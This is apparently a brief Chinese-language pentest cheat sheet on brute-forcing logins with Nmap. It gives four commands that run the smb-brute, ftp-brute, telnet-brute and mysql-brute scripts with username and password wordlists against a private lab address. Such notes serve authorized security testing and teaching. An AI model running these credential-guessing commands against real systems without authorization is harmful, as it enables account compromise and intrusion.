Nmap的简单爆破

nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128

results matching ""

    No results matching ""